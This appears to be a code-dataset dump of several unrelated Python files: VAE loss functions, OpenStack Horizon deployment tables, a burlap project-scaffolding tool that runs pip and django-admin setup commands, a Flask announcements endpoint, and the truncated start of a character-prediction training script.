"{'IskalnikKonfliktov': 'urnik.iskanik_konfliktov.IskalnikKonfliktov'}.PREKRIVANJA", "line_number": 143, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "119458064", "text": "import torch.nn as nn\n\n\n\ndef cos_loss(x, y):\n return 2 - (x).mul(y).mean()\n\n\ndef l1_loss(x, y):\n return (x - y).abs().mean()\n\n\ndef l2_loss(x, y, age=True):\n if age: # 1/(M*N)\n loss = (x - y).pow(2)\n else: # 1/N\n loss = (x - y).pow(2).view(list(x.size())[0], -1).sum(dim=-1)\n\n return loss.mean()\n\n\nclass KL_Loss_AGE(nn.Module):\n \"\"\"\n Kullback–Leibler Loss for the AGE model\n \"\"\"\n\n def __init__(self, minimize):\n \"\"\"\n\n :param minimize: Boolean parameter to change between minimizing and maximizing the Loss.\n \"\"\"\n super(KL_Loss_AGE, self).__init__()\n self.minimize = minimize\n self.mean = 0\n self.var = 0\n self.M = 0\n\n def forward(self, z):\n # Input normalized z\n \"\"\"\n :param z: The input/output (depends on the occasion) in the latent dimensional space\n :return: The loss of the data\n \"\"\"\n self.M = list(z.size())[1] # size of latent space\n self.mean = z.mean(dim=0)\n self.var = z.var(dim=0, unbiased=False)\n kl_loss = -1 / 2 + ((self.mean.pow(2) + self.var) / 2 - self.var.sqrt().log()).mean()\n\n if not self.minimize:\n kl_loss *= -1\n\n return kl_loss\n\n\nclass KL_Loss_Intro(nn.Module):\n \"\"\"\n Kullback–Leibler Loss for the IntroVAE model\n \"\"\"\n\n def __init__(self, minimize):\n \"\"\"\n\n :param minimize: Boolean parameter to change between minimizing and maximizing the Loss.\n\n \"\"\"\n super(KL_Loss_Intro, self).__init__()\n self.minimize = minimize\n self.mean = 0\n self.var = 0\n self.M = 0\n self.N = 0\n\n def forward(self, mean, logvar):\n \"\"\"\n\n :param mean: The mean of the input in the latent space\n :param logvar: The variance of the input in the latent space\n :return:\n \"\"\"\n\n # Input mean and variance of z\n self.M, self.N = list(mean.size())\n self.mean = mean\n self.logvar = logvar\n var = logvar.exp()\n kl_loss = (-1 - self.logvar + self.mean.pow(2) + var).mul_(0.5).sum(dim=-1)\n kl_loss = kl_loss.mean()\n\n if not self.minimize:\n kl_loss *= -1\n\n return kl_loss\n", "sub_path": "loss_functions.py", "file_name": "loss_functions.py", "file_ext": "py", "file_size_in_byte": 2239, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "22341126", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# COPYRIGHT (C) NEC CORPORATION 2016\n\nimport logging\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import messages\nfrom horizon import tables\nfrom openstack_dashboard.api import base\n\nfrom nec_portal.api.cloudify import Cloudify as cloudify_api\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ExecuteInstall(tables.BatchAction):\n \"\"\"Execute install class\"\"\"\n name = 'execute_install'\n verbose_name = _('Execute Install')\n policy_rules = ((\"tosca\", \"tosca:execution_install\"), )\n classes = ('tosca_confirm',)\n\n @staticmethod\n def action_present(count):\n return _('Execute Install')\n\n @staticmethod\n def action_past(count):\n return _('Executed Install')\n\n def action(self, request, object_id):\n try:\n cloudify_api(\n url_for_orchestration=(\n base.url_for(request, 'orchestration')\n ),\n token_id=request.user.token.id\n ).do_install(object_id)\n except Exception as e:\n LOG.error('DOSCA: Failed to start install. (%s)' % e)\n messages.error(request, e.message)\n raise Exception()\n\n\nclass ExecuteUninstall(tables.DeleteAction):\n \"\"\"Execute uninstall class\"\"\"\n name = 'execute_uninstall'\n verbose_name = _('Execute Uninstall')\n policy_rules = ((\"tosca\", \"tosca:execution_uninstall\"), )\n classes = ('btn-danger',)\n\n @staticmethod\n def action_present(count):\n return _('Execute Uninstall')\n\n @staticmethod\n def action_past(count):\n return _('Executed Uninstall')\n\n def delete(self, request, object_id):\n try:\n cloudify_api(\n url_for_orchestration=(\n base.url_for(request, 'orchestration')\n ),\n token_id=request.user.token.id\n ).do_uninstall(object_id)\n except Exception as e:\n LOG.error('DOSCA: Failed to uninstall. (%s)' % e)\n messages.error(request, e.message)\n raise Exception()\n\n\nclass DeleteDeployment(tables.DeleteAction):\n \"\"\"Delete deployment class\"\"\"\n name = 'delete_deployment'\n success_url = 'horizon:project:tosca_deployments:index'\n policy_rules = ((\"tosca\", \"tosca:deployment_delete\"), )\n\n @staticmethod\n def action_present(count):\n return _('Delete Deployment')\n\n @staticmethod\n def action_past(count):\n return _('Delete Deployment')\n\n def delete(self, request, object_id):\n try:\n cloudify_api(\n url_for_orchestration=(\n base.url_for(request, 'orchestration')\n ),\n token_id=request.user.token.id\n ).delete_deployment(object_id)\n except Exception as e:\n LOG.error('DOSCA: Failed to delete demployment. (%s)' % e)\n messages.error(request, e.message)\n raise Exception()\n\n\nclass CancelExecution(tables.DeleteAction):\n \"\"\"Cancel execution class\"\"\"\n name = 'cancel_execution'\n verbose_name = _('Cancel Execution')\n force = False\n\n @staticmethod\n def action_present(count):\n return _('Cancel Execution')\n\n @staticmethod\n def action_past(count):\n return _('Canceled Execution')\n\n def delete(self, request, object_id):\n try:\n cloudify_api(\n url_for_orchestration=(\n base.url_for(request, 'orchestration')\n ),\n token_id=request.user.token.id\n ).cancel_execution(object_id, self.force)\n except Exception as e:\n LOG.error('DOSCA: Failed to cancel. (%s)' % e)\n messages.error(request, e.message)\n raise Exception()\n\n def allowed(self, request, object):\n if object.status:\n if object.status == 'cancelling':\n self.force = True\n if object.status in ['started', 'cancelling']:\n return True\n return False\n\n\ndef get_execution_link_url(deployment):\n url = 'horizon:project:tosca_deployments:executions'\n return reverse(url, args=[deployment.id])\n\n\ndef get_eventlog_link_url(execution):\n url = 'horizon:project:tosca_deployments:eventlog'\n return reverse(url, args=[execution.id])\n\n\nclass ToscaDeploymentTable(tables.DataTable):\n \"\"\"Tosca Deployment Table class\"\"\"\n deployment_name = tables.Column('id',\n verbose_name=_('Deployment Name'),\n link=get_execution_link_url)\n template_name = tables.Column('template_id',\n verbose_name=_('Template Name'))\n created_at = tables.Column('created_at',\n verbose_name=_('Created At'))\n\n def get_object_id(self, deployment):\n return deployment.id\n\n class Meta(object):\n \"\"\"Meta class\"\"\"\n name = 'tosca_deployment_list'\n verbose_name = 'Deployments'\n\n row_actions = (ExecuteInstall, ExecuteUninstall,\n DeleteDeployment,)\n multi_select = False\n\n\nclass ToscaExecutionTable(tables.DataTable):\n \"\"\"Tosca Execution Table class\"\"\"\n id = tables.Column('id',\n verbose_name=_('Execution ID'),\n link=get_eventlog_link_url,\n sortable=False)\n workflow_id = tables.Column('workflow_id',\n verbose_name=_('Workflow ID'),\n sortable=False)\n status = tables.Column('status',\n verbose_name=_('Status'),\n sortable=False)\n error = tables.Column('error',\n verbose_name=_('Error'),\n sortable=False)\n created_at = tables.Column('created_at',\n verbose_name=_('Created At'),\n sortable=False)\n\n def get_object_id(self, execution):\n return execution.id\n\n class Meta(object):\n \"\"\"Meta class\"\"\"\n name = 'tosca_deployment_list'\n verbose_name = 'Deployments'\n\n row_actions = (CancelExecution,)\n multi_select = False\n", "sub_path": "nec_portal/dashboards/project/tosca_deployments/tables.py", "file_name": "tables.py", "file_ext": "py", "file_size_in_byte": 6785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "horizon.tables.BatchAction", "line_number": 30, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 43, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 47, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 49, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 49, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 55, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 55, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 59, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 59, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 62, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 68, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 76, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 78, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 84, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 84, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 88, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 88, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 100, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 104, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 106, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 106, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 112, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 112, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 116, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 116, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 119, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 124, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 128, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 132, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 134, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 134, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 140, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 140, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 154, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 159, "usage_type": "call"}, {"api_name": "horizon.tables.DataTable", "line_number": 162, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 162, "usage_type": "name"}, {"api_name": "horizon.tables.Column", "line_number": 164, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 164, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 165, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 167, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 167, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 168, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 169, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 169, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 170, "usage_type": "call"}, {"api_name": "horizon.tables.DataTable", "line_number": 185, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 185, "usage_type": "name"}, {"api_name": "horizon.tables.Column", "line_number": 187, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 187, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 188, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 191, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 191, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 192, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 194, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 194, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 195, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 197, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 197, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 198, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 200, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 200, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "107150061", "text": "from __future__ import print_function\n\nimport os\nimport re\n\nimport burlap\nfrom burlap import ContainerSatchel\nfrom burlap.constants import *\nfrom burlap.decorators import task\n\nfabfile_template = os.path.join(\n os.path.dirname(burlap.__file__),\n 'templates',\n 'burlap',\n 'fabfile.py.template',\n)\n\ndef md(d):\n if os.path.isdir(d):\n return\n os.makedirs(d)\n\ndef to_camelcase(value):\n value = re.sub(r'[^a-zA-Z0-9]+', ' ', value).strip()\n return ''.join(x.capitalize() for x in value.split(' '))\n\ndef init_dj(project_name, default_roles, virtualenv_dir='.env', version=None, **kwargs):\n\n site_name = project_name\n\n print('Installing Django...')\n if version:\n os.system('%s/bin/pip install Django==%s' % (virtualenv_dir, version))\n else:\n os.system('%s/bin/pip install Django' % virtualenv_dir)\n\n print('Initializing Django project...')\n if not os.path.isdir('src/%s' % site_name):\n print('Initializing base django project...')\n os.system('. %s/bin/activate; django-admin.py startproject %s src; deactivate' % (virtualenv_dir, site_name,))\n _settings_fn = os.path.abspath('src/%s/settings.py' % project_name)\n _content = open(_settings_fn, 'r').read()\n _sites = '''SITE_{name_upper} = \"{name_lower}\"\nSITES = (\n SITE_{name_upper},\n)\n'''.format(\n name_upper=project_name.upper(),\n name_lower=project_name.lower(),\n )\n _top = []\n for _role in default_roles:\n _top.append(\"ROLE_%s = '%s'\" % (_role.upper(), _role.lower()))\n _top.append('ROLES = (')\n for _role in default_roles:\n _top.append(\" ROLE_%s,\" % (_role.upper(),))\n _top.append(')')\n _index = _content.find('\"\"\"\\n\\n')+4\n\n bottom_args = dict(\n app_name=project_name,\n app_name_title=project_name.title() + ' Administration',\n app_name_simple=project_name.title()\n )\n _bottom = '''\nPROJECT_DIR = os.path.abspath(os.path.join(os.path.split(__file__)[0], '..', '..'))\n\nSTATIC_ROOT = os.path.join(PROJECT_DIR, 'static')\n\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\nMEDIA_URL = '/media/'\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\nTEMPLATE_DIRS = (\n '%s/src/{app_name}/templates' % PROJECT_DIR,\n)\n# https://docs.djangoproject.com/en/1.11/ref/settings/#templates\nTEMPLATES = [\n {{\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': TEMPLATE_DIRS,\n 'APP_DIRS': True,\n 'OPTIONS': {{\n #'loaders': TEMPLATE_LOADERS, # Unnecessary if we're using APP_DIRS.\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n }},\n }},\n]\nADMIN_TITLE = '{app_name_title}'\nADMIN_TITLE_SIMPLE = '{app_name_simple}'\n'''.format(**bottom_args)\n open(_settings_fn, 'w').write(_content[:_index]+_sites+('\\n'.join(_top))+_content[_index:]+_bottom)\n\n print('Creating Django helper scripts...')\n open('src/manage', 'w').write('''#!/bin/bash\n# Helper script for ensuring we use the Python binary in our local\n# virtual environment when calling management commands.\n# Otherwise, we'd have to always run `. ../.env/bin/activate`, which can be\n# annoying.\n# Be sue to run `fab pip.init` first in order to setup\n# the target role's Python virtual environment.\nDIR=`dirname $0`;\ncd $DIR;\n../.env/bin/python manage.py $@''')\n open('src/runserver', 'w').write('''#!/bin/bash\n# Helper script for running the local dev server, ensuring\n# our virtual environment is used.\n#set -e\n#script_dir=`dirname $0`\n#cd $script_dir\nif [ -z \"$PORT\" ]; then\nexport PORT=8111\nfi\nif [ -z \"$ROLE\" ]; then\nexport ROLE=dev\nfi\n. ~/.bash_aliases\n./manage runserver localhost:$PORT''')\n open('src/shell', 'w').write(r'''#!/bin/bash\n# Creates a local PIP-aware shell.\n#set -e\nif [ $_ == $0 ]\nthen\necho \"Please source this script. Do not execute.\"\nexit 1\nfi\n#script_dir=`dirname $0`\n#cd $script_dir\n. .env/bin/activate\nPS1=\"\\u@\\h:\\W(fab)\\$ \"''')\n\n md('media')\n md('static')\n\n os.system('chmod +x src/shell')\n os.system('chmod +x src/manage')\n os.system('chmod +x src/runserver')\n\n # Create the primary app for containing models/urls/views.\n if not os.path.isdir('src/%s' % project_name):\n os.system('cd src; ./manage startapp %s' % (project_name,))\n\n os.system('cd src; ./manage syncdb')\n\nclass ProjectSatchel(ContainerSatchel):\n\n name = 'project'\n\n def set_defaults(self):\n pass\n\n def update_settings(self, d, role, path='roles/{role}/settings.yaml'):\n \"\"\"\n Writes a key/value pair to a settings file.\n \"\"\"\n try:\n import ruamel.yaml\n load_func = ruamel.yaml.round_trip_load\n dump_func = ruamel.yaml.round_trip_dump\n except ImportError:\n print('Warning: ruamel.yaml not available, reverting to yaml package, possible lost of formatting may occur.')\n import yaml\n load_func = yaml.load\n dump_func = yaml.dump\n settings_fn = path.format(role=role)\n data = load_func(open(settings_fn))\n data.update(d)\n settings_str = dump_func(data)\n open(settings_fn, 'w').write(settings_str)\n\n @task\n def create_skeleton(self, project_name, roles='', components='', pip_requirements='', virtualenv_dir='.env', **kwargs):\n\n assert project_name, 'Specify project name.'\n site_name = project_name\n\n app_name = project_name\n\n default_roles = [_ for _ in roles.split(',') if _.strip()]\n default_components = [_.strip().lower() for _ in components.split(',') if _.strip()]\n\n print('Creating folders...')\n md('roles/all')\n for _role in default_roles:\n md('roles/%s' % _role)\n md('src')\n\n print('Creating roles...')\n open('roles/all/settings.yaml', 'w').write(\n self.render_to_string(\n 'burlap/all_settings.yaml.template',\n extra=dict(project_name=project_name, site_name=site_name, app_name=app_name)))\n for _role in default_roles:\n open('roles/%s/settings.yaml' % _role, 'w').write(\n self.render_to_string(\n 'burlap/role_settings.yaml.template',\n extra=dict(project_name=project_name, site_name=site_name, role=_role)))\n\n default_packages = pip_requirements.split(',')\n if default_packages:\n open('roles/all/pip-requirements.txt', 'w').write('\\n'.join(default_packages))\n\n print('Adding global apt-requirements.txt...')\n open('roles/all/apt-requirements.txt', 'w').write('')\n\n print('Adding fabfile...')\n content = open(fabfile_template, 'r').read()\n content = content.format(project_name=project_name)\n open('fabfile.py', 'w').write(content.strip()+'\\n')\n\n print('Initializing local development virtual environment...')\n os.system('virtualenv --no-site-packages %s' % virtualenv_dir)\n for package in default_packages:\n os.system('. %s/bin/activate; pip install %s; deactivate' % (virtualenv_dir, package))\n\n # Install burlap dependencies.\n burlap_pip_requirements = os.path.join(os.path.dirname(burlap.__file__), 'fixtures/requirements.txt')\n print('burlap_pip_requirements:', burlap_pip_requirements)\n assert os.path.exists(burlap_pip_requirements), 'Missing requirements file: %s' % burlap_pip_requirements\n for package in open(burlap_pip_requirements, 'r').readlines():\n if not package.strip():\n continue\n cmd = '%s/bin/pip install %s' % (virtualenv_dir, package)\n print('cmd:', cmd)\n assert not os.system(cmd)\n\n print('Adding bash setup...')\n open('setup.bash', 'w').write(self.render_to_string('burlap/setup.bash.template'))\n\n print('Adding gitignore...')\n open('.gitignore', 'w').write(self.render_to_string('burlap/gitignore.template'))\n\n args = kwargs.copy()\n args['project_name'] = project_name\n args['roles'] = roles\n args['default_roles'] = default_roles\n args['components'] = components\n args['pip_requirements'] = pip_requirements\n args['virtualenv_dir'] = virtualenv_dir\n for component in default_components:\n print('Setting up component %s...' % component)\n # Get component-specific settings.\n component_kwargs = dict(args)\n for _k, _v in kwargs.items():\n _key = component+'_'\n if _k.startswith(_key):\n component_kwargs[_k[len(_key):]] = _v\n del component_kwargs[_k]\n print('component_kwargs:', component_kwargs)\n try:\n globals()['init_%s' % component](**component_kwargs)\n except KeyError:\n pass\n\n print('='*80)\n print()\n print('Skeleton created for project %s!' % (project_name.title(),))\n print()\n\n @task\n def add_roles(self, roles):\n for role in roles:\n _role = role.strip().lower()\n fn = 'roles/%s/settings.yaml' % _role\n if os.path.isfile(fn):\n continue\n fn_dir = os.path.split(fn)[0]\n if not os.path.isdir(fn_dir):\n os.makedirs(fn_dir)\n open(fn, 'w').write(\n self.render_to_string('burlap/role_settings.yaml.template', extra=dict(role=_role)))\n print('Added role %s!' % role)\n\n @task\n def create_satchel(self, name):\n name_simple = re.sub(r'[^a-z0-9]+', '', name.lower())\n content = self.render_to_string(\n 'burlap/satchel.py.template',\n extra=dict(\n name_camelcase=to_camelcase(name),\n name_simple=name_simple,\n ))\n if not os.path.isdir('satchels'):\n os.makedirs('satchels')\n os.system('touch satchels/__init__.py')\n satchel_fn = 'satchels/%s.py' % name_simple\n open(satchel_fn, 'w').write(content.strip()+'\\n')\n print('Wrote %s.' % satchel_fn)\n\nproject = ProjectSatchel()\n", "sub_path": "burlap/project.py", "file_name": "project.py", "file_ext": "py", "file_size_in_byte": 10640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "burlap.__file__", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 24, "usage_type": "call"}, {"api_name": "os.system", "line_number": 33, "usage_type": "call"}, {"api_name": "os.system", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 148, "usage_type": "call"}, {"api_name": "os.system", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 153, "usage_type": "call"}, {"api_name": "os.system", "line_number": 155, "usage_type": "call"}, {"api_name": "burlap.ContainerSatchel", "line_number": 157, "usage_type": "name"}, {"api_name": "ruamel.yaml.yaml", "line_number": 170, "usage_type": "attribute"}, {"api_name": "ruamel.yaml", "line_number": 170, "usage_type": "name"}, {"api_name": "ruamel.yaml.yaml", "line_number": 171, "usage_type": "attribute"}, {"api_name": "ruamel.yaml", "line_number": 171, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 175, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 224, "usage_type": "call"}, {"api_name": "os.system", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 229, "usage_type": "call"}, {"api_name": "burlap.__file__", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 237, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 281, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 272, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 296, "usage_type": "call"}, {"api_name": "os.system", "line_number": 297, "usage_type": "call"}, {"api_name": "burlap.decorators.task", "line_number": 286, "usage_type": "name"}, {"api_name": "{'ruamel.yaml': 'ruamel.yaml', 'yaml': 'yaml'}", "line_number": 302, "usage_type": "call"}]} +{"seq_id": "208653415", "text": "from flask import Blueprint, jsonify\n\nfrom app.web_app.announcements.models import Announcement, db\n\nmobile = Blueprint('mobile_announcements', __name__, url_prefix='/mobile/announcements')\n\n\n@mobile.route('/get/')\ndef get_announcement(announcement_id):\n announcement = Announcement.query.get(announcement_id)\n\n if announcement:\n announcement.downloads += 1\n db.session.add(announcement)\n db.session.commit()\n return jsonify({\n \"error\": \"None\",\n \"announcement\": {\n \"subject\": announcement.title,\n \"content\": announcement.content,\n \"ref_number\": announcement.ref_number,\n \"date_posted\": announcement.date_posted\n },\n \"sender\": {\n \"name\": announcement.sender.first_name + announcement.sender.last_name,\n \"department\": announcement.sender.department.name\n }\n })\n else:\n return jsonify({\n \"error\": \"NotFound\"\n })\n", "sub_path": "app/mobile/announcements/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1044, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.Announcement.query.get", "line_number": 10, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.Announcement.query", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.Announcement", "line_number": 10, "usage_type": "name"}, {"api_name": "app.web_app.announcements.models.db.session.add", "line_number": 14, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.db.session", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.db", "line_number": 14, "usage_type": "name"}, {"api_name": "app.web_app.announcements.models.db.session.commit", "line_number": 15, "usage_type": "call"}, {"api_name": "app.web_app.announcements.models.db.session", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.web_app.announcements.models.db", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "287930136", "text": "import os\nimport random\nimport time\nimport math\nimport wikipedia\nfrom google_trans_new import google_translator\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport numpy as np\n\nCURR_DIR = os.path.dirname(os.path.realpath(__file__))\nDATA_DIR = os.path.join(CURR_DIR, '../data')\nEMBEDDING_DIM = 300\nEMBEDDINGS_PATH = os.path.join(CURR_DIR, \"embeddings.txt\")\nHIDDEN_SIZE = 2048\nNUM_LAYERS = 2\nCHUNK_LEN = 400\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nBATCH_SIZE = 128\nTEST_DATA = test_data = [\n ('Happ', 'y'),\n ('Happy Ne', 'w'),\n ('Happy New Yea', 'r'),\n ('That’s one small ste', 'p'),\n ('That’s one sm', 'a'),\n ('That’', 's'),\n ('Th', 'a'),\n ('one giant leap for mankin', 'd'),\n ('one giant leap fo', 'r'),\n ('one giant lea', 'p'),\n ('one giant l', 'e'),\n ('one gia', 'n'),\n ('on', 'e'),\n ('Ruin h', 'a'),\n ('Ruin has co', 'm'),\n ('Ruin has come to o', 'u'),\n ('Ruin has come to our fam', 'i'),\n ('Ruin has come to our famil', 'y'),\n ('You rem', 'e'),\n ('You remember our vene', 'r'),\n ('You remember our venerabl', 'e'),\n ('You remember our venerable hou', 's'),\n ('You remember our venerable house, op', 'u'),\n ('You remember our venerable house, opulent and im', 'p'),\n ('You remember our venerable house, opulent and imperia', 'l'),\n ('G', 'a'),\n ('Gaz', 'i'),\n ('Gazin', 'g'),\n ('Gazing pro', 'u'),\n ('Gazing proudl', 'y'),\n ('Gazing proudly from its sto', 'i'),\n ('Gazing proudly from its stoic 